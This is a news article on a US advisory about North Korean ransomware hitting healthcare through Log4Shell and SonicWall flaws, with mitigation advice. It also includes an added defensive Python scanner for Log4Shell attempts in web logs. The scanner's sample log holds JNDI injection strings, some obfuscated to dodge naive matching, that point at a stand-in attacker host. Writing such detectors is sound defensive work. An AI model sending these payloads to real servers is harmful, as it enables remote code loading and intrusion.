U.S. agencies are warning healthcare organizations and other critical infrastructure organizations to be aware of recent activity from a North Korean nation-state ransomware group that is leveraging older vulnerabilities, including Log4Shell, to gain access into victim environments.
The advisory from the FBI, U.S. Cybersecurity and Infrastructure Security Agency and other agencies gives an overview of the Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware, which has been targeting healthcare and public health organizations, as well as other critical infrastructure organizations.
According to the agencies, the cryptocurrency ransom payments are being used to fund DPRK priorities and objectives, including cyber operations against U.S. and South Korean defense agencies and industries.
The advisory supplements previous reports on malicious DPRK campaigns, including the Maui and H0lyGh0st ransomware.
Agencies say the DPRK actors gain initial access to victim environments and escalate privileges using known vulnerabilities such as Log4Shell and remote code execution bugs in unpatched SonicWall SMA 100 appliances.
According to the advisory, after initial access, DPRK actors use staged payloads to perform reconnaissance activities, upload and download additional files and executables, and execute shell commands. The staged malware is also responsible for collecting victim information and sending it to the remote host controlled by the actors.
The actors use privately deployed ransomware, such as Maui and H0lyGh0st, but also use publicly available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom. In some cases, the DPRK actors pretend to be other ransomware groups, such as REvil.
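As an added illustration, not part of the article or of the advisory it summarizes, of what detecting the Log4Shell initial-access vector described above can look like on the defender's side: a small Python scanner that walks web-server access-log lines, normalizes the common nested-lookup obfuscation that a naive string match misses, and reports any request carrying a JNDI lookup together with its source address and the lookup scheme. The log lines, IP addresses and hostnames are constructed for the example.

```python
import re

# Constructed sample access-log lines (combined log format) for illustration only;
# the addresses and hostnames are not from the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Feb/2023:10:01:07 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"
10.0.0.9 - - [10/Feb/2023:10:01:09 +0000] "GET /api/v1/status HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://attacker.example/b}"
10.0.0.12 - - [10/Feb/2023:10:02:00 +0000] "GET /docs?q=${env:HOME} HTTP/1.1" 404 0 "-" "curl/7.81.0"
"""

# Log4j lookups can be nested: ${lower:j} resolves to "j", and ${x:-y} resolves to
# the default value "y". Both are routinely used to break up the literal string
# "${jndi:" so that simple pattern matching does not see it. The two patterns below
# only match innermost lookups (no braces inside), so repeated substitution
# unwraps nesting from the inside out.
NESTED_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
DEFAULT_VALUE_RE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")

# After normalization the lookup reads ${jndi:<scheme>:...}; capture the scheme
# (ldap, ldaps, rmi, dns, ...) for the finding.
JNDI_RE = re.compile(r"\$\{jndi:([a-z0-9+.-]*):", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Collapse nested case and default-value lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = NESTED_CASE_RE.sub(r"\1", text)
        new = DEFAULT_VALUE_RE.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def scan_log(text):
    """Return one finding per log line that contains a JNDI lookup after normalization."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        if not raw.strip():
            continue
        norm = normalize(raw)
        match = JNDI_RE.search(norm)
        if match:
            findings.append({
                "line": lineno,
                "source": raw.split(" ", 1)[0],   # client address is the first field
                "scheme": match.group(1).lower(),
                "normalized": norm,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['source']} sent a jndi:{f['scheme']} lookup")
```

The scanner only matches the normalized text, which is why the third sample line (the split `${${lower:j}ndi:` form) is reported alongside the plain one, while the `${env:HOME}` lookup on the last line is left alone because it is not a JNDI lookup. On real systems the same check should run over every request field the client controls, not only the user-agent column used here; the patterns are a starting point for triage rather than a complete ruleset.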
In addition to taking basic steps to prepare for and mitigate ransomware incidents, such as keeping regular and secure backups, creating an incident response plan, keeping systems updated and practicing other good cyber hygiene, organizations in the healthcare sector are urged to:
- Limit access to data by authenticating and encrypting connections (e.g., using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections) with network services, Internet of Things (IoT) medical devices, and the electronic health record system.
- Implement the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts, which grant excessive system administration privileges.
- Turn off weak or unnecessary network device management interfaces, such as Telnet, SSH, Winbox, and HTTP for wide area networks (WANs), and, where they must remain enabled, secure them with strong passwords and encryption.
- Protect stored data by masking the permanent account number (PAN) when displayed and rendering it unreadable when stored—through cryptography, for example.
- Secure the collection, storage, and processing practices for personally identifiable information (PII)/protected health information (PHI), per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures could prevent the introduction of malware to the system.
- Secure PII/PHI at collection points and encrypt the data at rest and in transit using technologies such as TLS. Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available.
- Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
- Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
- Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
Read the advisory for more information.